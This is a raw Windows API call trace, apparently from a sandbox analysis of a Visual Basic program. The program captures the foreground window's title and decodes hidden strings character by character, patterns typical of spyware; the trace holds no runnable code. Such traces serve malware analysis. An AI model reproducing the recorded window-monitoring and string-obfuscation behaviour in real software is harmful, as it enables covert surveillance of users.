[0177.464] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0177.464] SysStringLen (param_1="Folde") returned 0x5 [0177.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Folde", cchWideChar=6, lpMultiByteStr=0x1150ca4, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Folde", lpUsedDefaultChar=0x0) returned 6 [0177.465] SetWindowTextA (hWnd=0x103c4, lpString="Folde") returned 1 [0177.465] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x26 [0177.465] GetFocus () returned 0x0 [0177.465] lstrlenA (lpString="Folde") returned 5 [0177.465] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0177.518] IsWindow (hWnd=0x103c4) returned 1 [0177.518] IsWindow (hWnd=0x103c4) returned 1 [0177.518] IsWindow (hWnd=0x103c4) returned 1 [0177.518] IsWindow (hWnd=0x103c4) returned 1 [0177.519] GetFocus () returned 0x0 [0177.519] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0177.519] GetFocus () returned 0x0 [0177.519] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0177.519] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0177.519] GetFocus () returned 0x0 [0177.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Folde", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0177.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Folde", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=6 | out: lpWideCharStr="Folde") returned 6 [0177.520] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0177.520] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0177.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.521] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0177.521] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.522] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0177.522] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.523] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0177.523] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.524] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.524] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.525] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0177.525] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.525] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0177.526] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.526] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.526] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.527] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0177.527] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.528] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.533] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.534] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.534] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.534] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.535] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.535] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.536] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.536] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.536] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.537] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0177.537] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.538] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.538] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.539] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.539] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.540] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0177.540] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.540] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.541] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.541] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.542] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.542] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.543] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.543] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.543] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.548] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.549] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.549] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.550] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.550] GetForegroundWindow () returned 0x10162 [0177.550] GetLastError () returned 0x0 [0177.550] SysStringLen (param_1=" ") returned 0xff [0177.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0177.550] SysStringLen (param_1=" ") returned 0xff [0177.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0177.550] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0177.551] GetLastError () returned 0x0 [0177.551] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0177.551] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0177.551] SysStringLen (param_1="Bla") returned 0x3 [0177.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Bla", cchWideChar=4, lpMultiByteStr=0x116863c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bla", lpUsedDefaultChar=0x0) returned 4 [0177.552] SetWindowTextA (hWnd=0x103c4, lpString="Bla") returned 1 [0177.552] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0177.552] GetFocus () returned 0x0 [0177.552] lstrlenA (lpString="Bla") returned 3 [0177.552] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116863c) returned 0x1 [0177.553] IsWindow (hWnd=0x103c4) returned 1 [0177.553] IsWindow (hWnd=0x103c4) returned 1 [0177.553] IsWindow (hWnd=0x103c4) returned 1 [0177.553] IsWindow (hWnd=0x103c4) returned 1 [0177.554] GetFocus () returned 0x0 [0177.554] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0177.554] GetFocus () returned 0x0 [0177.554] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0177.554] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0177.554] GetFocus () returned 0x0 [0177.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bla", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0177.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bla", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=4 | out: lpWideCharStr="Bla") returned 4 [0177.555] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0177.555] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0177.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.556] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0177.556] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.557] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0177.557] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.557] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0177.558] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.558] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0177.559] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.719] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0177.719] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: 